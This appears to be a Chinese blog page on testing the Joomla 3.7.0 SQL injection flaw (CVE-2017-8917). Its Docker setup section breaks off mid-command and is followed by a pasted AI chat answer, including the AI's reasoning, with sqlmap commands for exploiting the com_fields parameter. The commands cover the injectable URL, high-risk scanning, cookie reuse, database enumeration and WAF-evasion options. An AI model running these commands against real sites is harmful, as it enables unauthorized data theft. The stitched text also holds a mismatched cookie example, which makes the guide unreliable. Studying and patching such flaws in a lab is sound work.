Joomla 3.7.0 (CVE-2017-8917) 漏洞测试

Joomla 3.7.0 (CVE-2017-8917) 漏洞测试

本漏洞测试使用的是虚拟机Ubuntu 18.04 LTS

一、环境搭建

1、docker的安装

.更新apt包索引
sudo apt-get update

在这里插入图片描述

.安装以下包以使apt可以通过HTTPS使用存储库(repository)
sudo apt-get install -y apt-transport-https ca-certificates curl software-properties-common
.添加Docker官方的GPG密钥
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -

在这里插入图片描述

.使用下面的命令来设置stable存储库
sudo add-apt-
<think>好的,我现在需要帮助用户了解如何使用sqlmap对Joomla 3.7.0进行SQL注入漏洞测试。首先,我得回忆一下Joomla 3.7.0的漏洞情况。记得这个版本存在一个特定的SQL注入漏洞,具体是在com_fields组件中的参数过滤不严导致的。接下来,用户可能需要具体的步骤指导,所以应该分步骤说明。 第一步是确认漏洞存在。用户需要确保目标Joomla版本确实是3.7.0,可以通过访问如/README.txt或管理员登录页面来确认。这部分需要详细说明,因为版本确认是关键的前提。 然后是使用sqlmap进行测试。这里需要给出具体的命令示例,包括如何构造URL,特别是参数部分。比如,漏洞可能存在于option参数和view参数中,需要指定哪些参数可能存在注入点。此外,设置level和risk级别可能会影响检测的深度,可能需要调整这些参数以提高检测效果。 接下来,可能需要处理cookie或身份验证的问题。如果目标页面需要登录,用户需要提供有效的会话cookie,sqlmap才能访问受保护的页面进行测试。这里需要提醒用户如何获取并传递cookie信息。 在利用漏洞时,可能需要指定具体的数据库类型,比如MySQL,以及选择适当的注入技术,如基于时间的盲注。这部分需要具体命令示例,确保用户能够正确输入参数。 最后,用户可能需要获取数据库信息或执行其他操作,如导出数据或执行操作系统命令。需要说明这些步骤所需的参数,并提醒用户注意法律和道德规范。 另外,用户可能不了解如何获取cookie或者如何处理动态参数,可能需要进一步解释。比如使用浏览器开发者工具获取cookie,或者使用Burp Suite拦截请求。同时,需要强调合法授权的必要性,避免用户进行未经授权的测试。 还要考虑用户可能遇到的问题,例如sqlmap没有检测到漏洞,这时候可能需要检查URL构造是否正确,参数是否有效,或者是否存在WAF拦截。此外,可能需要调整sqlmap的选项,如使用--random-agent绕过简单的用户代理检测。 最后,生成相关问题,帮助用户进一步了解相关主题,比如漏洞原理、其他工具的使用,或者防御措施。这些问题需要与Joomla漏洞和sqlmap使用相关,确保覆盖用户可能感兴趣的方向。 整个过程中,要确保步骤清晰,命令准确,同时提醒用户注意法律和道德问题,避免滥用工具。需要参考提供的引用信息,特别是关于Joomla漏洞的部分,确保信息准确可靠。</think>### 使用sqlmap测试Joomla 3.7.0 SQL注入漏洞的步骤 Joomla 3.7.0存在CVE-2017-8917漏洞,该漏洞由`com_fields`组件未正确过滤用户输入导致。以下是利用sqlmap进行测试的详细流程: #### 1. 确认目标环境 - 验证Joomla版本是否为3.7.0 访问`http://target.com/README.txt`或管理员登录页面`/administrator/manifests/files/joomla.xml`查看版本号[^1] #### 2. 构造测试URL 漏洞存在于`option=com_fields&view=fields`路径中,需构造包含以下参数的URL: ```bash http://target.com/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=test ``` #### 3. 基础注入检测命令 ```bash sqlmap -u "http://target.com/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=test" --risk=3 --level=5 ``` - `--risk=3`: 允许使用基于时间的盲注等高风险检测 - `--level=5`: 启用所有检测载荷 #### 4. 身份验证处理(如需) 若需要登录态,添加cookie参数: ```bash sqlmap -u "目标URL" --cookie="JSESSIONID=xxx; security=high" --dbms=mysql ``` #### 5. 数据库指纹识别 ```bash sqlmap -u "目标URL" --banner --current-user ``` #### 6. 数据提取示例 获取数据库列表: ```bash sqlmap -u "目标URL" --dbs ``` #### 关键参数说明表 | 参数 | 作用 | 典型值 | |------|------|--------| | `--tamper` | 绕过WAF | `tamper=space2comment` | | `--random-agent` | 伪装UA | 随机浏览器UA | | `--time-sec` | 调整时延 | 2-5秒 | | `--threads` | 并发数 | 5-10 |
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

四季度非

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值